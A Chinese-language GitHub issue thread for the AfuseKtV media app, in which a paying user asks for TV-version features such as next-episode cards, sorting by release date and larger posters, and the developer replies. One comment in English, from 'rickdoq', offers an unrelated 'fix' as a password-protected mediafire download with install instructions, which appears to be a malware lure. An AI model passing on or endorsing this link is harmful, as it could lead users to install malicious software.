### ISSUE TITLE
一些建议

### ISSUE THREAD

**Issue by jiemo9527** [AttemptD/AfuseKtV-release#5]
已经是永久PRO用户，希望对tv版功能进行优化:
1..接下来功能:比如第一集播放完毕，下次在主页可以看到接下来第二集的卡片栏目。jellyfin官方版是有的
2..资源的排列顺序:希望添加按发行时间的选项，这个非常实用。
3..海报卡片大小:对于tv而言，目前展示的资源列表的海报卡片比较小。不美观方便

以上是急需且重要的需求项

**Comment by jiemo9527** [comment]
以及:
已播放和未播放的"小眼睛"，没有区别
剧集右上角的角标数字或✓，非常实用

**Comment by AttemptD** [comment]
以我的测试jellyfin是没有的，emby有，目前emby就有这种功能，数据全由服务端返回发自我的 iPhone在 2024年8月31日，13:49，芥默 ***@***.***> 写道：﻿
已经是永久PRO用户，希望对tv版功能进行优化:
接下来功能:比如第一集播放完毕，下次在主页可以看到接下来第二集的卡片栏目。jellyfin官方版是有的
资源的排列顺序:希望添加按发行时间的选项，这个非常实用。
海报卡片大小:对于tv而言，目前展示的资源列表的海报卡片比较小。不美观方便
以上是急需且重要的需求项

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by jiemo9527** [comment]
> 以我的测试jellyfin是没有的，emby有，目前emby就有这种功能，数据全由服务端返回发自我的 iPhone在 2024年8月31日，13:49，芥默 ***@***.***> 写道：﻿ 已经是永久PRO用户，希望对tv版功能进行优化: 接下来功能:比如第一集播放完毕，下次在主页可以看到接下来第二集的卡片栏目。jellyfin官方版是有的 资源的排列顺序:希望添加按发行时间的选项，这个非常实用。 海报卡片大小:对于tv而言，目前展示的资源列表的海报卡片比较小。不美观方便 以上是急需且重要的需求项 —Reply to this email directly, view it on GitHub, or unsubscribe.You are receiving this because you are subscribed to this thread.Message ID: ***@***.***>

我提了5点  哪个没有
